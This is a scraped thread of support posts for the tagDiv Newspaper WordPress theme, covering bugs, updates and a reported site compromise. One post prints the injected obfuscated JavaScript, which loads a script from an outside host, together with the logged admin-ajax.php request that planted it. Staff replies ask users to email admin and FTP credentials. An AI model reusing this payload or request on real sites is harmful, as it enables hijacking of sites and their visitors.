Our developers made an update for users that have this problem, please check this topic – https://forum.tagdiv.com/topic/sql-injection-in-tagdiv-composer-again/
Hello,
Our developers made an update to help the users that reported this problem.
What we recommend is to make the update to v12.1.1 (for this please check in Newspaper > Updates, click on check for updates).
Before making the update please be sure that injected code has been removed.
We hope this will prevent that specific js from being saved.
Let us know the results!
In the documentation of the Thumbnail problem here, it is said that it can be solved with the Thumbnail Regenerate plugin, but this plugin has not been updated for the past 2 years, after seeing the review and blog the developer turns out that the plugin maker has died.
The question is, is this plugin still working properly? since it’s already been 3 years I’m afraid this will also be another conflict to cache or SEO plugins. Waiting for the update of this plugin is already impossible. Tagdiv’s Newspaper team may be able to update the documentation for other optional plugins.
Hello, I’ve installed Newspaper with a child theme. Child theme is now active. Is it possible to perform the autoupdate from the Theme Panel, with the Install button under the udpates menu? Or should we take some extra steps?
Cheers,
Daniele.
Thanks Calin, I will update asap to new version. I have answered you in the other post saying that the code only works when injected manually, as we show you, and caches were cleaned after the injection. If caches not cleaned or code is not here in custom fields the site works fine (so it couldn’t be an infected file in the server because the malware should then ALWAYS work, I hope I’m explaining well).
-
This reply was modified 3 years by
loslunes.
Ok thats the answer I wanted. I would update asap.
If any file infected in all the server files then the malware will run ALWAYS. The problem is that the malware only works when the hacker use tdcomposer / tdpanel option (as my partner and I said) to put into the custom javascript and custom html.
When you delete the code from there (I made 2 days ago and, fortunately, it doesn’t appears again) and clean caches, all works fine. When the code is injected and caches are not cleaned, the code doesn’t works because it has been not applied. I mean, it only happens when someone use td panel vulnerability to inject it. I donÂŽt know if only in old version, I have 11.5.1.
Thanks for the help
Same problem here since I have update to WP 6.1. The margin down an image (without a legend) has dissapeared
-
This reply was modified 3 years by
loslunes.
Hi,
Please contact us via email at contact@tagdiv.com and provide the following:
âwp-admin URL and credentials
â a link to this topic to identify you
Also, during the update, know that we will disable the other non-tagDiv plugins.
Thank you!
Hi,
Please contact us via email at contact@tagdiv.com and provide the following:
âwp-admin URL and credentials
-FTP/cPanel URL and credentials
â a link to this topic to identify you
Also, during the update, know that we will disable the other non-tagDiv plugins.
Thank you!
Hello,
the Newspaper theme is not compatible with the Yoast Video SEO plugin. When installed and enabled, the RSS feed shows wrong media enhancements with a doubled domain, so services like Deezer do not update the feeds, due to 404 errors caused by that links. They look like:
<media:thumbnail url="https://www.literaturcafe.de/www.literaturcafe.de/wp-content/uploads/rebecca_gable-1-1190x448.jpg" />
<media:content url="https://www.literaturcafe.de/www.literaturcafe.de/wp-content/uploads/rebecca_gable-1-1190x448.jpg" medium="image">
Here are the results of different settings:
– Standard theme Twentytwo with Yoast SEO: Video
=> Only post with videos have the media:thumbnail tag in rss-feed (desired behavior)
– Newspaper theme with Yoast SEO: Video
=> ALL posts have the media:thumbnail tag in rss-feed with wrong double-domain
– Newspaper theme with Yoast SEO: Video DISABLED
=> NO posts have the media:thumbnail tag in rss-feed
– Newspaper theme with Yoast SEO: Video enabled and ‘disable media RSS enhancement’ option in plugin settings ticked
=> NO posts have the media:thumbnail tag in rss-feed
I reported this issue to the Yoast support, and this is their reply:
Thank you for troubleshooting this. We endeavor to be compatible with the main page builders in WordPress, like Elementor, and other important themes in the WordPress environment, but in this case, would you mind escalating this to the theme developer so they can look into this further? If they need anything from us, they can email us with the details and we’d be happy to help them troubleshoot.
Could you please fix this or get in contact with Yoast to fix this.
Hi,
Please contact us via email at contact@tagdiv.com and provide the following:
âwp-admin URL and credentials
-FTP/cPanel URL and credentials
â a link to this topic to identify you
Also, during the update, know that we will disable the other non-tagDiv plugins.
Thank you!
Hi,
Please contact us via email at contact@tagdiv.com and provide the following:
âwp-admin URL and credentials
-FTP/cPanel URL and credentials
â a link to this topic to identify you
Also, during the update, know that we will disable the other non-tagDiv plugins.
Thank you!
Hello,
Please update to the last version. The problem was caused by the compatibility with WordPress 6 and was fixed in version 11.5.1 -> https://tagdiv.com/newspaper/?utm_source=forum&utm_medium=menu&utm_campaign=forum_loggedin&utm_content=92178
Thank you!
@hmedia05 backup, delete folder wp-clearlineee in /public_html/wp-content/plugins, delete wp-clearlineee.zip in /public_html/wp-content/uploads/2022/11, delete any zip file in this folder, delete evrything in folder /public_html/wp-content/upgrade
take a look in /public_html is any new file, compare index.php
backup
update plugins, wordpress, theme
Change permission for /public_html/wp-content/upgrade to 444, when you need somthing to upgrade change to 755
Weâre experiencing a CRITICAL issue across multiple Newspaper websites. Somehow an unauthorized user is able to upload a plugin through admin-ajax.php and inject the redirect script to: Theme Panel -> Custom Code -> Custom Javascript
Itâs being posted to tagdiv custom javascript through action=td_ajax_update_panel.
It seems that this is a widespread issue on Newspaper and needs an urgent patch!
This is being reported by others also
https://forum.tagdiv.com/topic/jskryptik-co-trojan-found-in-composer-plugin/#post-457869
The script thatâs being injected is:
eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));
This is the action:
135.125.178.115 â â [11/Nov/2022:20:26:49 +0000] âPOST /wp-admin/admin-ajax.php HTTP/1.0â 200 1 âhttps://site-url-removed.com/wp-admin/admin-ajax.phpâ âMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0â 0.000 1.588 1.588 200 1.588 action=td_ajax_update_panel&td_magic_token=c8ae20cbbe&td_option%5Btds_custom_javascript%5D=eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C112%2C115%2C100%2C100%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C41%2C59%2C32%2C118%2C97%2C114%2C32%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C32%2C61%2C32%2C102%2C97%2C108%2C115%2C101%2C59%2C102%2C111%2C114%2C32%2C40%2C118%2C97%2C114%2C32%2C105%2C32%2C61%2C32%2C48%2C59%2C32%2C105%2C32%2C60%2C32%2C112%2C115%2C100%2C100%2C46%2C108%2C101%2C110%2C103%2C116%2C104%2C59%2C32%2C105%2C43%2C43%2C41%2C32%2C123%2C32%2C32%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C41%2C32%2C123%2C32%2C32%2C32%2C9%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C32%2C61%2C61%2C32%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C41%2C123%2C32%2C9%2C9%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C116%2C114%2C117%2C101%2C59%2C32%2C9%2C32%2C125%2C32%2C32%2C32%2C125%2C32%2C32%2C125%2C105%2C102%2C40%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C61%2C102%2C97%2C108%2C115%2C101%2C41%2C123%2C32%2C9%2C118%2C97%2C114%2C32%2C100%2C61%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C59%2C118%2C97%2C114%2C32%2C115%2C61%2C100%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C115%2C46%2C105%2C100%2C61%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C59%2C115%2C46%2C115%2C114%2C99%2C61%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C49%2C48%2C52%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C50%2C44%2C49%2C49%2C53%2C44%2C53%2C56%2C44%2C52%2C55%2C44%2C52%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C57%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C49%2C57%2C44%2C49%2C48%2C49%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C52%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C50%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C50%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C48%2C57%2C44%2C52%2C54%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C48%2C57%2C44%2C52%2C55%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C48%2C54%2C44%2C49%2C49%2C53%2C44%2C54%2C51%2C44%2C49%2C49%2C56%2C44%2C54%2C49%2C44%2C52%2C57%2C44%2C52%2C57%2C44%2C52%2C54%2C44%2C53%2C48%2C44%2C53%2C49%2C41%2C59%2C32%2C105%2C102%2C32%2C40%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C32%2C123%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C46%2C112%2C97%2C114%2C101%2C110%2C116%2C78%2C111%2C100%2C101%2C46%2C105%2C110%2C115%2C101%2C114%2C116%2C66%2C101%2C102%2C111%2C114%2C101%2C40%2C115%2C44%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C59%2C125%2C32%2C101%2C108%2C115%2C101%2C32%2C123%2C100%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C39%2C104%2C101%2C97%2C100%2C39%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C115%2C41%2C59%2C125%2C32%2C125%29%29%3B
I have used add ‘Text with title’ element in the past (no problems), for adding iframes for mail subscriber forms and other things. I have recently tried to add ‘text with title’ element and when I click on ‘edit content’, the WP Editor pops up but then it gets stuck loading with a looping circle but it never loads.
I updated to version 11.5 Newspaper and perhaps it broke then. Is this a known issue? Is there a fix?
I’m looking the custom codes option every 30 min xD. This is insane. Anyway, I’m waiting the server to make a backup and a relaxing moment in my website (It’s happening when our visit has increased 300% from 5 months ago… so it’s a big problem having malware injected that random way) to update to last version and see if the problem persists.
Anyway, they should make a deep investigation about the issue and stop telling us its “our problem”
-
This reply was modified 3 years by
loslunes.
Hello @Bettina
Is there any update to solve my problem?
Let me know the results!
It is very unfortunate if it takes a long time to solve a problem in the new state ?
-
This reply was modified 3 years by
Ismail H Shikdar.
I deleted it on Monday when someone here talks about this code in your theme custom JavaScript and clean all the caches. The problem was solved.
Yesterday, I looked more than 10 times firing the day until its appears again in my last view at 11:40 pm. I look into the log and saw a strange behaviour in the ip I said calling to admin ajax two times after asking for home page and then this ip leave.
Its someone who called to and action related to the theme like our partner shows above. So it seems to be a vulnerability of the composer.
I have version 11.5.1 so maybe I have to update and see of coming back… I will let you know and if the problem persists we will talk again about you to look into our panel.
Is there any option for mobile theme of last updated or modified date?
Hello I upgraded to the new version of News Paper and I noticed that when I open my site opens immediately a banner with spam advertising I also viewed the js code and I did not find anything important . I also can’t access the update page of the template and some pages of the site at the template editing level are not found in the server.
Hi,
The CPT archive template should be added in the coming theme update.
Thank you!
Hello,
I’m really in love with every update that is being delivered for Newspaper theme but, I would like, if possible, to leave here some suggestions for future features, and also some possible bugs I’ve found while playing around with tagdiv shortcodes in my website.
I’ll try my best to explain below, all the features and bugs founds related with newspaper theme.
Possible BUGS detected?
1 – “Tabbed Content” with a flexbox block 5 does not display the row columns correctly when the “Style 1 – Tabs on top” is used. This is the page result with the tab content shortcode (not formated correctly) – https://gamingnovato.com/popular/. This is the page used inside the tab – https://gamingnovato.com/popular-gaming/ (well formated)
2 – The “Flex Loop Filters” shortcodehttps://imgur.com/undefined does not display the live modifications I make in composer plugin. The shortcode appears “different” as shown in the image.
3 – In the shortcode “Post List”, in the “General Text” section, the line heigh seems to do nothing to the post. Changing it does not affect the text – https://imgur.com/rAiUQXG
Possible new features to be implemented?
1 – On the shortcode “Tabbed Content”, make the tabs act as a slide on mobile. Right now they are static, and when having multiple tabs added, this new feature becomes a bug (tabs are cut and not possible to be seen and select – live example: https://gamingnovato.com/popular/)
2 – More easy / intuitive way to display custom fields in a shortcode. Right now I believe the only possible way to do this is using one of the imported CPT from a demo – https://imgur.com/8Lfl5b7 and then editing the source files or using some CSS on them. I understand that this might be a more tricky and hard job to do, but it would help alot in mantaining the non-complexibility of composer plugin and would be just too perfect to dinamic create those styles too đ
3 – In the shortcode “Posts List” https://imgur.com/ctkKzEJ there should be added more “Columns to display” options, for example “Category”.
4 – I really love the new possibility implement by your guys, that allow users to edit and add posts directly in front-end, but even as a regular user, I find myself lacking a feature to directly edit a singular post without having to go to the post listing feature. What I mean is, there should be a way to add a feature directly into a singular post and even on flex blocks that would allow users to directly edit that sepecic post. This would work for any user with permission for that, ofc.
5 – Somehow related with the previous suggestion, the system should allow users to edit other people posts (if they are allowed to do so). Right now from what I’ve checked, I cannot edit a post created by someone else. For example, I have 2 admin profiles on my website, but my Admin number 2, even though he can see all the posts created in the website, when I click “Edit” with him the custom page opened is displayed with the fields blank (none of them are selected).
6 – Regarding the post creation by users,there should be a functionality that allow users to report other users posts (for any reason).
7– Regarding the posts created by the users, there should be a feature that allow the users to add it to a favourite list or maybe a “read later” list.
8 – Regarding the users, I believe it would be cool to have a functionality to follow users / authors and/or the posts they create or categories.
9– A feature that tracks all the posts and pages visited by the user? Something like youtube history (videos views).
10 – In the shortcode “Post List”, right now the listing seem to be missing some important features. In my case, I have alot of posts created (alot more to be added) and I missed a functionality for filter those posts for example by posts status (pending, draft, etc), and an even more important feature that is a way to keyword search a post so I can easyly find the post I want to edit. Going to the pagination is a tedious and almost impossible work to find the intent post to be eddited.
11– In the shortcode “Post List” maybe add the possibility to have other types of loading, for example “Infinite loading”
12 – In the “Post List” shortcode, deleting a post does not display a confirmation message. I believe there should be some type of alert message alerting the user of this action
13 – What about a functionality that link the subscription system with ads displaying? For example after a user subscribe a service, he no longer sees the ads displayed in the website.
14 – I feel like despite having some styling options for the comment sections, it is now time to add some more features to it. For example liking comments.
15 – What about BBPRESS and Buddypress? Is there a plan to start including composer plugin on it?
@walshcreative which version of Newspaper installed? Just wanted to know if the problem is with all version because I have said before we have 11.5.1 (because I don’t remember to update) and was affected to until our partner @breakeven give the solution. Anyway, is a great vulnerability that they have to solve asap.
-
This reply was modified 3 years by
loslunes.